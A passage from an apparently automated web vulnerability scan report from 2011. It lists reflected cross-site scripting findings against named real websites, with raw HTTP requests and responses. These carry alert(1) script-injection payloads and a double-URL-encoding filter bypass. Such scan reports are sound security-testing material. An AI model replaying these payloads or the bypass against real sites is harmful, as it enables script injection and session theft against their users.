Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8b7a1a276454ffaafa910c756ad6e0d5; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:37 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:38 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:40 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbTOtDI0sjQzszC3tLSwrgVcMFxcRwat; expires=Thu, 02-Feb-2012 23:06:40 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1";
       ipb.sharelinks.title = "Vanilla Valentine";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3942-sos31-file-version-in-online-list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf855"-alert(1)-"7755996cd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c8dae556708fda16a70e1ba264087145; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:31 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:32 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:34 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbLOtDI0sjQzszC3tDSyrgVcMFxcRQao; expires=Thu, 02-Feb-2012 23:06:34 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1";
       ipb.sharelinks.title = "(SOS31) File Version in Online List";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3943-speed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7e3"-alert(1)-"7fa62b66d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ff77aa3002ae5ebe3b9da498e614ab3e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:32 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:35 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:37 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbbOtDI0sjQzszC3tDSxrgVcMFxcWwar; expires=Thu, 02-Feb-2012 23:06:37 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1";
       ipb.sharelinks.title = "Speed";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3944-ipchat-12-turkish-language-pack/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9a9"-alert(1)-"dc3219cb2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=1944fba0c751e2b21987bd8118d01990; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:20 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:23 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:24 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbHOtDI0sjQzszC3tDC0rgVcMFxcXgao; expires=Thu, 02-Feb-2012 23:06:24 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 44007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1";
       ipb.sharelinks.title = "IP.Chat 1.2 Turkish Language Pack";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455b5'><a>78f4a32a5a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources/documentation/index.html?455b5'><a>78f4a32a5a9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e664c7c64f3b4729c92627fef198c533; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:45 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32784

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?455b5'><a>78f4a32a5a9=1' />
...[SNIP]...

3.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dff31'><script>alert(1)</script>1470dab73a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=0226a82b48937e63fc6cf50878e14f6a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:25 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:25 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmloYWFibWtVwwUC0GOQ%2C%2C; expires=Fri, 03-Feb-2012 00:11:25 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34426

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1' />
...[SNIP]...

3.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9564a'><script>alert(1)</script>f6702a3a7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e3d274e04eb68da8518ccc19e454a496; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:39 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:39 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNLSwtLSuBVwwVe8GcQ%2C%2C; expires=Fri, 03-Feb-2012 00:11:39 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33664

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1' />
...[SNIP]...

3.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da888'><script>alert(1)</script>8095f60edfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=a9bd7f2f7a35acf5a28529ed3969c3d7; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:29 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:29 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmloYWFhbWtVwwUEkGPg%2C%2C; expires=Fri, 03-Feb-2012 00:11:29 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33886

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1' />
...[SNIP]...

3.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3f88'><script>alert(1)</script>0031e83123d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=d323303f034c4eef3dca54fb788a70ee; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:13 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:13 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNLQwN7SuBVwwVhEGaw%2C%2C; expires=Fri, 03-Feb-2012 00:11:13 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30663

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1' />
...[SNIP]...

3.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /resources/official.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e492'><a>093e292e14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /resources/official.html?2e492'><a>093e292e14d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f58e59b2d0925781bc9226b17dda3b43; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32784

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?2e492'><a>093e292e14d=1' />
...[SNIP]...

3.54. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29 was submitted in the REST URL parameter 2. This input was echoed as 3cf50"><script>alert(1)</script>89c53a9cf29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /japan-news/16713cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cj9PCk000000iW6rcNrdSziWggn6yemmaw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:09 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/16713cf50"><script>alert(1)</script>89c53a9cf29/tuna-costs-254-000-in-japan/&title=Chinese%20New%20Year%20boosts%20Japan%20tourism">
...[SNIP]...

3.55. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

